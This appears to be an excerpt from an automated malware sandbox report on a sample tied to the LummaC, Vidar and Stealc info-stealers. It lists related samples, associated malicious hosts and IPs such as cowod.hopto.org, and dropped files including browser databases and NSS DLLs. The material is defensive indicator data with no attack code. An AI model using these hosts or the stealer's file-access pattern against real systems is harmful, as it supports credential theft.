                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                cowod.hopto.orgf1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                HETZNER-ASDEdown.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.9.188
                                                                                                                                                BzLGqYKy7o.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                https://cloud.list.lu/index.php/s/znw4dNSttiDzHTBGet hashmaliciousUnknownBrowse
                                                                                                                                                • 85.10.195.17
                                                                                                                                                UV2uLdRZix.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                • 148.251.114.233
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 116.203.9.188
                                                                                                                                                LKpIHL2abO.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                • 188.40.141.211
                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.104.203
                                                                                                                                                na.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                • 116.203.104.203
                                                                                                                                                http://suraj-tumuluri.github.io/UI-Clone-NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                • 78.46.22.25
                                                                                                                                                LIFELINK-ASRUf1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                VLSiVR4Qxs.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                7f3c2473d1e6.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                bomb.exeGet hashmaliciousAmadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 45.132.206.251
                                                                                                                                                AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                cenSXPimaG.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                • 23.43.32.11
                                                                                                                                                FdjDPFGTZS.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                http://kendellseafoods.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.44.86
                                                                                                                                                TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                51c64c77e60f3980eea90869b68c58a8file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 49.12.106.214
                                                                                                                                                37f463bf4616ecd445d4a1937da06e19PEDIDO-144848.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                SecuriteInfo.com.Win64.TrojanX-gen.22573.8055.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                jre-6-windows-i586.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                transferencia.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                t5985gRtZo.lnkGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                ZAMOWIEN.EXE.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                0urFbKxdvL.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                • 104.102.49.254
                                                                                                                                                zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                • 104.102.49.254
Match                         Associated Sample Name / URL    Detection    Threat Name
C:\ProgramData\freebl3.dll    wULBz8VjH0.exe                  malicious    Vidar
                              FdjDPFGTZS.exe                  malicious    LummaC, Stealc, Vidar
                              45Ywq5ad5H.exe                  malicious    LummaC, Stealc, Vidar
                              f1r6P3j3g7.exe                  malicious    LummaC, Vidar
                              file.exe                        malicious    Stealc, Vidar
                              NdSXVNeoET.exe                  malicious    LummaC, Stealc, Vidar
                              VLSiVR4Qxs.exe                  malicious    LummaC, Vidar
                              file.exe                        malicious    Vidar
                              file.exe                        malicious    Stealc, Vidar
                              file.exe                        malicious    Stealc, Vidar
C:\ProgramData\mozglue.dll    wULBz8VjH0.exe                  malicious    Vidar
                              FdjDPFGTZS.exe                  malicious    LummaC, Stealc, Vidar
                              45Ywq5ad5H.exe                  malicious    LummaC, Stealc, Vidar
                              f1r6P3j3g7.exe                  malicious    LummaC, Vidar
                              file.exe                        malicious    Stealc, Vidar
                              NdSXVNeoET.exe                  malicious    LummaC, Stealc, Vidar
                              VLSiVR4Qxs.exe                  malicious    LummaC, Vidar
                              file.exe                        malicious    Vidar
                              file.exe                        malicious    Stealc, Vidar
                              file.exe                        malicious    Stealc, Vidar
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):5242880
                                                                                                                                                                                        Entropy (8bit):0.03859996294213402
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                        MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                        SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                        SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                        SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):51200
                                                                                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):98304
                                                                                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:data
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):32768
                                                                                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):40960
                                                                                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):196608
                                                                                                                                                                                        Entropy (8bit):1.121297215059106
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                        MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                        SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                        SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                        SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):106496
                                                                                                                                                                                        Entropy (8bit):1.136413900497188
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                        MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                        SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                        SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                        SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                        Entropy (8bit):0.8439810553697228
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                        MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                        SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                        SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                        SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):9504
                                                                                                                                                                                        Entropy (8bit):5.512408163813622
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                        MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                        SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                        SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                        SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):159744
                                                                                                                                                                                        Entropy (8bit):0.5394293526345721
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                        MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                        SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                        SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                        SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):155648
                                                                                                                                                                                        Entropy (8bit):0.5407252242845243
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                        MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                        SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                        SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                        SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):685392
                                                                                                                                                                                        Entropy (8bit):6.872871740790978
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                        MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                        SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                        SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                        SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: wULBz8VjH0.exe, Detection: malicious
                                                                                                                                                                                        • Filename: FdjDPFGTZS.exe, Detection: malicious
                                                                                                                                                                                        • Filename: 45Ywq5ad5H.exe, Detection: malicious
                                                                                                                                                                                        • Filename: f1r6P3j3g7.exe, Detection: malicious
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious
                                                                                                                                                                                        • Filename: NdSXVNeoET.exe, Detection: malicious
                                                                                                                                                                                        • Filename: VLSiVR4Qxs.exe, Detection: malicious
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious
                                                                                                                                                                                        Process:C:\Users\user\Desktop\out.exe
                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                        Size (bytes):608080
                                                                                                                                                                                        Entropy (8bit):6.833616094889818
                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                        SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                        MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                        SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                        SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                        SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                                        • Filename: wULBz8VjH0.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: FdjDPFGTZS.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: 45Ywq5ad5H.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: f1r6P3j3g7.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: NdSXVNeoET.exe, Detection: malicious, Browse
                                                                                                                                                                                        • Filename: VLSiVR4Qxs.exe, Detection: malicious, Browse
